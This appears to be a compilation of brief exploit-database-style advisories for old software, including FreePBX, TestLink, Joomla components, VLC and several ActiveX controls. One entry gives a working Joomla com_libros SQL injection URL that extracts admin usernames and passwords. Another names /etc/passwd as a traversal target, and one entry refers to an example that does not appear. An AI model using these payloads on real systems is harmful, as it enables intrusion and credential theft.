A permanent Cross Site Scripting vulnerability was found in FreePBX 2.5.x and 2.6, because the application fails to sanitize user-supplied input. The vulnerability can be triggered by any logged-in user who is able to add an Inbound Route.
Multiple directory traversal vulnerabilities has been found in Testlink(http://www.teamst.org/) a popular and acclaimed free, open source Test management tool written in PHP. The issue discovered can only be exploited with an authenticated session. This directory traversal vulnerability is present in the file /testlink/lib/usermanagement/userInfo.php & In testlink 1.8.4 these issues can be exploited by setting the variable "editUser"& "locale" like below with a HTTP POST request.
This exploit is a local denial of service vulnerability in Muziic Player. It is triggered by creating a malicious .mp3 file with 5000 'A' characters, which causes the application to crash when opened. This exploit was discovered by Red-D3v1L in 2010.
A buffer overflow vulnerability exists in the chat.ghp script of the web application. An attacker can send a specially crafted request with an overly long username and password parameter to the vulnerable script, which can cause a stack-based buffer overflow and allow arbitrary code execution.
Admin login bilgileri alinabilir. http://server/index.php?option=com_libros&task=detail&Itemid=27&id=[EXPLOIT] Exploit:null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+jos_users--
A directory traversal vulnerability exists in Joomla Component com_prime, which allows an attacker to read arbitrary files on the server. This is due to the application not properly sanitizing user-supplied input to the 'lang' parameter. An attacker can leverage this vulnerability to read sensitive files on the server, such as the /etc/passwd file.
This exploit allows remote attackers to execute arbitrary code on vulnerable installations of Xunlei XPPlayer ActiveX. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Xunlei XPPlayer ActiveX control, which listens by default on TCP port 8888. By sending a specially crafted packet to this port, an attacker can gain arbitrary code execution under the context of the user.
This exploit is a buffer overflow vulnerability in VLC media player version 0.6.8. It allows an attacker to execute arbitrary code on the vulnerable system by sending a specially crafted .ASS file. The exploit has been tested on Windows XP SP2 and works every time.
This is a proof-of-concept exploit for a remote execution vulnerability in TrendMicro Web-Deployment ActiveX. The vulnerability allows an attacker to execute arbitrary code on the target system by sending a specially crafted request to the vulnerable ActiveX control. The exploit was tested on Windows XP SP3 with Internet Explorer 6.
This vulnerability exists in Microsoft Internet Explorer due to a memory corruption issue when processing an object tag. An attacker can exploit this vulnerability by convincing a user to open a malicious web page containing a specially crafted object tag. Successful exploitation could result in arbitrary code execution in the context of the current user.
Services By CQR